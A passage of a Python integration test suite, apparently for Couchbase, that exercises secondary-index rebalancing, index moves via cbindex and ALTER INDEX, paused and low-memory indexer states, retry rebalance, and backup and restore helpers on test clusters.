self._kill_all_processes_index(self.servers[self.nodes_init])
t1.join()
for item in iter(queue.get, None):
log.info(item)
if [x for x in item if "WatcherServer.runOnce() : Watcher terminated unexpectedly".format(self.servers[self.nodes_init].ip) in x]:
msg = "error found"
log.info("error found")
break
else:
pass
# queue.queue.clear()
if msg == "error found":
break
if msg != "error found":
self.fail("cbindex move did not fail when indexer server was killed")
def test_gsi_rebalance_with_multiple_nodes_in_swap_rebalance(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = nodes_out_list[1:3]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_different_scan_consistency(self):
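# While index nodes are being swap rebalanced, run the same query with request_plus,
# statement_plus and not_bounded scan consistency, then verify index redistribution.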
n1ql_server = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
to_remove_nodes = nodes_out_list[1:3]
services_in = ["index", "index"]
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 2], [], to_remove_nodes)
query = "SELECT * FROM default where `question_values` IS NOT NULL ORDER BY _id"
result_rp = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="request_plus")
result_sp = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="statement_plus")
result_nb = self.n1ql_helper.run_cbq_query(query=query, server=n1ql_server, scan_consistency="not_bounded")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_out_last_indexer_node_and_add_one_indexer_node(self):
self.run_operation(phase="before")
self.sleep(30)
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], nodes_out_list)
# Queries running while this rebalance operation is going on will fail as the only indexer node is going out.
#self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
to_add_nodes = self.servers[self.nodes_init:self.nodes_init + 2]
services_in = ["index", "index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.run_operation(phase="before")
def test_gsi_rebalance_in_indexer_node_with_node_eject_only_as_false(self):
self.run_operation(phase="before")
self.sleep(30)
indexer_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for indexer_node in indexer_nodes:
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.rebalance.node_eject_only": False})
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results, indexes should be redistributed even in case of rebalance in
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [], swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_with_disable_index_move_as_true(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexer_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for indexer_node in indexer_nodes:
rest = RestConnection(indexer_node)
rest.set_index_settings({"indexer.rebalance.disable_index_move": True})
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
# Don't run queries after removing a node: the indexer rebalance above may drop indexes
# the queries depend on, which would fail the queries and the test
#self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
#self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results, Indexes should not be redistributed as disable_index_move was set as True
try:
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
except Exception as ex:
if "some indexes are missing after rebalance" not in str(ex):
self.fail("gsi rebalance failed with unexpected error: {0}".format(str(ex)))
else:
self.fail("gsi rebalance distributed indexes even after disable_index_move is set as true")
#self.run_operation(phase="after")
def test_nest_and_intersect_queries_after_gsi_rebalance(self):
self.run_operation(phase="before")
intersect_query = "select name from {0} intersect select name from {0} s where s.age>20".format(self.buckets[0],
self.buckets[0])
nest_query = "select * from {0} b1 nest `default` b2 on keys b1._id where b1._id like 'airline_record%' limit 5".format(
self.buckets[0])
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
for i in range(0, 2):
try:
self.n1ql_helper.run_cbq_query(query=intersect_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=nest_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query with nest and intersect failed")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
# Run intersect/nest queries post index redistribution
for i in range(0, 10):
try:
self.n1ql_helper.run_cbq_query(query=intersect_query, server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=nest_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
raise Exception("query with nest and intersect failed")
self.run_operation(phase="after")
def test_gsi_rebalance_out_indexer_node_when_other_indexer_is_in_paused_state(self):
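# Shrink the index memory quota, create extra indexes and push the indexer into the paused
# state with kv mutations, then attempt to rebalance out the new index node and expect failure.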
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.rest.set_service_memoryQuota(service='indexMemoryQuota', memoryQuota=256)
for i in range(2):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_airlines_data_query_definitions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# Do some kv mutations
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
# Ensure the indexer reaches the paused state
self._push_indexer_off_the_cliff()
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [self.servers[self.nodes_init]])
RestHelper(self.rest).rebalance_reached()
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail when indexer is in paused state")
def test_alter_index_when_src_indexer_is_in_paused_state(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure the indexer reaches the paused state
self._push_indexer_off_the_cliff(index_server)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes, self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_alter_index_when_dest_indexer_is_in_paused_state(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.sleep(60)
index_map, stats_map = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
index_map)
index_hostname_before = self.n1ql_helper.get_index_details_using_index_name(
"p1", index_map)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._push_indexer_off_the_cliff(index_server)
output, error = self._cbindex_move(self.servers[self.nodes_init],
index_server,
"p1",
self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
else:
# Alter index query will succeed, but it should later error out since the dest node is in OOM.
# Validate that the index is not moved.
index_map, stats_map = self._return_maps()
index_hostname_after = self.n1ql_helper.get_index_details_using_index_name(
"p1", index_map)
self.assertEqual(index_hostname_before, index_hostname_after,
"Alter index moved the index to an indexer in paused state")
def test_alter_index_without_action(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
alter_idx_query = "ALTER INDEX default.p1 with {{'action':'','nodes':\"{0}:{1}\"}}".format(
index_server.ip, index_server.port)
try:
result = self.n1ql_helper.run_cbq_query(query=alter_idx_query,
server=self.n1ql_node)
self.log.info(result)
except Exception as ex:
if not "Unsupported action value" in str(ex):
self.log.info(str(ex))
self.fail(
"Alter index did not fail with expected error message")
def test_alter_index_when_src_indexer_is_in_dgm(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to DGM
self.get_dgm_for_plasma(index_server)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes, self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_alter_index_when_dest_indexer_is_in_dgm(
self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
query = "CREATE PRIMARY INDEX p1 on default USING GSI with {{'nodes':\"{0}:{1}\"}}".format(
self.servers[self.nodes_init].ip,
self.servers[self.nodes_init].port)
self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.sleep(60)
index_map, stats_map = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
index_map)
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to DGM
self.get_dgm_for_plasma(index_server)
output, error = self._cbindex_move(self.servers[self.nodes_init],
index_server,
"p1",
self.alter_index,
remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(
self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
if error:
self.log.info("ERROR : %s" % error)
self.fail("Alter index resulted in error")
def test_explain_query_while_alter_index_is_running(self):
kv_server = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
index_server = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(
map_before_rebalance)
output, error = self._cbindex_move(index_server,
self.servers[self.nodes_init],
indexes,
self.alter_index,
remote_host=kv_server)
explain_query = "EXPLAIN SELECT DISTINCT(age) from `default` where age > 18 LIMIT 10"
try:
result = self.n1ql_helper.run_cbq_query(query=explain_query,
server=self.n1ql_node)
self.log.info(result)
except Exception as ex:
self.log.info(str(ex))
self.fail("Alter index did not fail with expected error message")
def test_cbindex_move_from_any_node_apart_from_src_dest(self):
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
        # run cbindex move from any host other than src or dest; not valid for alter index
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, self.alter_index, remote_host=kv_server)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_retry_rebalance(self):
body = {"enabled": "true", "afterTimePeriod": self.retry_time , "maxAttempts" : self.num_retries}
rest = RestConnection(self.master)
rest.set_retry_rebalance_settings(body)
result = rest.get_retry_rebalance_settings()
self.shell.execute_cbworkloadgen(rest.username, rest.password, 2000000, 100, "default", 1024, '-j')
if not self.build_index:
self.run_operation(phase="before")
self.sleep(30)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
if self.rebalance_out:
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
try:
if self.build_index:
thread1 = threading.Thread(name='ddl', target=self.create_workload_index)
thread1.start()
self.sleep(5)
if self.rebalance_out:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
else:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[self.nodes_init]], [],
services=services_in)
self.sleep(4)
# reboot an index node during gsi rebalance
if not self.build_index:
self.reboot_node(index_server)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
except Exception as ex:
if "Rebalance failed" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail("rebalance did not fail after index node reboot")
# Rerun rebalance to check if it can recover from failure
if self.build_index:
thread1.join()
self.check_retry_rebalance_succeeded()
if self.rebalance_out and not self.build_index:
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [index_server])
def create_workload_index(self):
workload_index = "CREATE INDEX idx12345 ON default(name)"
self.n1ql_helper.run_cbq_query(query=workload_index,
server=self.n1ql_node)
return
def _return_maps(self):
index_map = self.get_index_map()
stats_map = self.get_index_stats(perNode=False)
return index_map, stats_map
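    # Moves the given index either via a N1QL ALTER INDEX statement (alter_index=True)
    # or via the cbindex command-line tool run over SSH (alter_index=False).
    # Illustrative call only, with hypothetical node objects src, dst and kv_node:
    #   output, error = self._cbindex_move(src, dst, "idx1", alter_index=False,
    #                                      remote_host=kv_node)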
    def _cbindex_move(self, src_node, dst_node, index_list, alter_index=False, queue=None, run_from_dst=False,
                      username="Administrator", password="password", expect_failure=False, bucket="default",
                      remote_host=None):
ip_address = str(dst_node).replace("ip:", "").replace(" port",
"").replace(
" ssh_username:root", "").replace(" ssh_username:Administrator", "")
if alter_index:
alter_index_query = 'ALTER INDEX default.' + index_list + ' WITH {{"action":"move","nodes": ["{0}"]}}'.format(
ip_address)
try:
self.n1ql_helper.run_cbq_query(query=alter_index_query,
server=self.n1ql_node)
return "success", ""
except Exception as ex:
self.log.info(str(ex))
return "", str(ex)
else:
cmd = """cbindex -type move -index '{0}' -bucket {1} -with '{{"nodes":"{2}"}}' -auth '{3}:{4}'""".format(
index_list,
bucket,
ip_address,
username,
password)
log.info(cmd)
if run_from_dst:
connection_node = dst_node
else:
connection_node = src_node
if remote_host is not None:
connection_node = remote_host
remote_client = RemoteMachineShellConnection(connection_node)
command = "{0}/{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Moving Index for' in x]:
if expect_failure:
log.info("cbindex move failed")
if queue is not None:
queue.put(output, error)
return output, error
else:
self.fail("cbindex move failed")
else:
log.info("cbindex move started successfully : {0}".format(output))
if queue is not None:
queue.put(output, error)
return output, error
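    # Note: only the first index found in the index map is returned (with a count of 1),
    # so the move/alter-index helpers above operate on a single index at a time.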
def _get_indexes_in_move_index_format(self, index_map):
for bucket in index_map:
for index in index_map[bucket]:
return index, 1
def wait_for_cbindex_move_to_complete(self, dst_node, count):
no_of_indexes_moved = 0
exit_count = 0
while no_of_indexes_moved != count and exit_count != 10:
index_map = self.get_index_map()
host_names_after_rebalance = []
index_distribution_map_after_rebalance = {}
for bucket in index_map:
for index in index_map[bucket]:
host_names_after_rebalance.append(index_map[bucket][index]['hosts'])
for node in host_names_after_rebalance:
index_distribution_map_after_rebalance[node] = index_distribution_map_after_rebalance.get(node, 0) + 1
ip_address = str(dst_node).replace("ip:", "").replace(" port", "").replace(" ssh_username:root", "").replace(" ssh_username:Administrator", "")
log.info(ip_address)
log.info(index_distribution_map_after_rebalance)
if ip_address in index_distribution_map_after_rebalance:
no_of_indexes_moved = index_distribution_map_after_rebalance[ip_address]
else:
no_of_indexes_moved = 0
log.info("waiting for cbindex move to complete")
self.sleep(30)
exit_count += 1
if no_of_indexes_moved == count:
log.info("cbindex move completed")
else:
self.fail("timed out waiting for cbindex move to complete")
def run_operation(self, phase="before"):
if phase == "before":
self.run_async_index_operations(operation_type="create_index")
elif phase == "during":
self.run_async_index_operations(operation_type="query")
else:
self.run_async_index_operations(operation_type="query")
self.run_async_index_operations(operation_type="drop_index")
def _drop_index(self, query_definition, bucket):
query = query_definition.generate_index_drop_query(
bucket=bucket,
use_gsi_for_secondary=self.use_gsi_for_secondary,
use_gsi_for_primary=self.use_gsi_for_primary)
log.info(query)
actual_result = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_server)
def _create_index_with_defer_build(self, defer_build=True):
for bucket in self.buckets:
for query_definition in self.query_definitions:
query = query_definition.generate_index_create_query(
bucket=bucket, use_gsi_for_secondary=self.use_gsi_for_secondary,
deploy_node_info=None, defer_build=defer_build)
log.info(query)
create_index_task = self.cluster.async_create_index(
server=self.n1ql_server, bucket=bucket, query=query,
n1ql_helper=self.n1ql_helper,
index_name=query_definition.index_name,
defer_build=defer_build)
create_index_task.result()
def _build_index(self, sleep=30):
exceptions = []
try:
for bucket in self.buckets:
for query_definition in self.query_definitions:
query = self.n1ql_helper.gen_build_index_query(
bucket=bucket, index_list=[query_definition.index_name])
build_index_task = self.cluster.async_build_index(
server=self.n1ql_server, bucket=bucket, query=query,
n1ql_helper=self.n1ql_helper)
build_index_task.result()
self.sleep(sleep)
except Exception as ex:
exceptions.append(str(ex))
finally:
return exceptions
def _set_indexer_compaction(self):
DAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
date = datetime.now()
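        # Schedule the compaction window a few minutes ahead of "now"; the hour and
        # weekday are rolled over when adding the minutes crosses an hour/day boundary.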
dayOfWeek = (date.weekday() + (date.hour + ((date.minute + 5) // 60)) // 24) % 7
status, content, header = self.rest.set_indexer_compaction(indexDayOfWeek=DAYS[dayOfWeek],
indexFromHour=date.hour + ((date.minute + 2) // 60),
indexFromMinute=(date.minute + 2) % 60,
indexToHour=date.hour + ((date.minute + 3) // 60),
indexToMinute=(date.minute + 3) % 60,
abortOutside=True)
self.assertTrue(status, "Error in setting Circular Compaction... {0}".format(content))
def _set_bucket_compaction(self):
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(self.master, bucket))
for task in compact_tasks:
task.result()
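    # Load documents in increasing batches until the indexer reports the "Paused"
    # (out-of-memory) state, giving up after 20 attempts.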
def _push_indexer_off_the_cliff(self, index_server=None):
cnt = 0
docs = 3000
while cnt < 20:
if self._validate_indexer_status_oom(index_server):
log.info("OOM on index server is achieved")
return True
for task in self.kv_mutations(docs):
task.result()
self.sleep(30)
cnt += 1
docs += 3000
return False
def _validate_indexer_status_oom(self, index_server=None):
if not index_server:
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rest = RestConnection(index_server)
index_stats = rest.get_indexer_stats()
if index_stats["indexer_state"].lower() == "paused":
return True
else:
return False
def kv_mutations(self, docs=1):
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs)
self.full_docs_list = self.generate_full_docs_list(gens_load)
self.gen_results = TuqGenerators(self.log, self.full_docs_list)
tasks = self.async_load(generators_load=gens_load, op_type="create",
batch_size=self.batch_size)
return tasks
def kill_erlang(self, server):
"""Kill erlang process running on server.
"""
NodeHelper._log.info("Killing erlang on server: {0}".format(server))
shell = RemoteMachineShellConnection(server)
os_info = shell.extract_remote_info()
shell.kill_erlang(os_info)
shell.start_couchbase()
shell.disconnect()
def kill_memcached1(self, server):
remote_client = RemoteMachineShellConnection(server)
remote_client.kill_memcached()
remote_client.disconnect()
def _create_backup(self, server, username="Administrator", password="password"):
remote_client = RemoteMachineShellConnection(server)
command = self.cli_command_location + "cbbackupmgr config --archive /data/backups --repo example{0}".format(
self.rand)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'created successfully in archive' in x]:
self.fail("cbbackupmgr config failed")
cmd = "cbbackupmgr backup --archive /data/backups --repo example{0} --cluster couchbase://127.0.0.1 --username {1} --password {2}".format(
self.rand, username, password)
command = "{0}{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Backup successfully completed' in x]:
self.fail("cbbackupmgr backup failed")
def _create_restore(self, server, username="Administrator", password="password"):
remote_client = RemoteMachineShellConnection(server)
cmd = "cbbackupmgr restore --archive /data/backups --repo example{0} --cluster couchbase://127.0.0.1 --username {1} --password {2} --force-updates".format(
self.rand, username, password)
command = "{0}{1}".format(self.cli_command_location, cmd)
output, error = remote_client.execute_command(command)
remote_client.log_command_output(output, error)
if error and not [x for x in output if 'Restore completed successfully' in x]:
self.fail("cbbackupmgr restore failed")
def _run_prepare_statement(self):
query = "SELECT * FROM system:indexes"
result_no_prepare = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)['results']
query = "PREPARE %s" % query
prepared = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_server)['results'][0]
result_with_prepare = self.n1ql_helper.run_cbq_query(query=prepared, is_prepared=True, server=self.n1ql_server)[
'results']
msg = "Query result with prepare and without doesn't match.\nNo prepare: %s ... %s\nWith prepare: %s ... %s"
self.assertTrue(sorted(result_no_prepare) == sorted(result_with_prepare),
msg % (result_no_prepare[:100], result_no_prepare[-100:],
result_with_prepare[:100], result_with_prepare[-100:]))
def _kill_all_processes_cbq(self, server):
shell = RemoteMachineShellConnection(server)
o = shell.execute_command("ps -aef| grep cbq-engine")
if len(o):
for cbq_engine in o[0]:
if cbq_engine.find('grep') == -1:
pid = [item for item in cbq_engine.split(' ') if item][1]
shell.execute_command("kill -9 %s" % pid)
def _kill_all_processes_index(self, server):
shell = RemoteMachineShellConnection(server)
shell.execute_command("killall indexer")
def _kill_fts_process(self, server):
shell = RemoteMachineShellConnection(server)
shell.kill_cbft_process()
shell.disconnect()
def _create_replica_index(self, query):
self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
##############################################################################################
#
# N1QL Tests
##############################################################################################
def ansi_join_query(self, stage="", expected=""):
query = "select * from (select default.country from default d unnest d.travel_details as default limit 1000) d1 " \
"inner join `travel-sample` t on (d1.country == t.country)"
if stage == "pre_rebalance":
self.n1ql_helper.run_cbq_query(query="CREATE INDEX idx ON `travel-sample`(country)", server=self.n1ql_node)
expected_results = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
return expected_results
elif stage =="post_rebalance":
actual_results = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
self.assertEqual(expected['metrics']['resultCount'], actual_results['metrics']['resultCount'])
else:
self.n1ql_helper.run_cbq_query(query="DROP INDEX `travel-sample`.idx", server=self.n1ql_node)
def test_kv_and_gsi_rebalance_with_high_ops(self):
self.rate_limit = self.input.param("rate_limit", 100000)
self.batch_size = self.input.param("batch_size", 1000)
self.doc_size = self.input.param("doc_size", 100)
self.instances = self.input.param("instances", 1)
self.threads = self.input.param("threads", 1)
self.use_replica_to = self.input.param("use_replica_to", False)
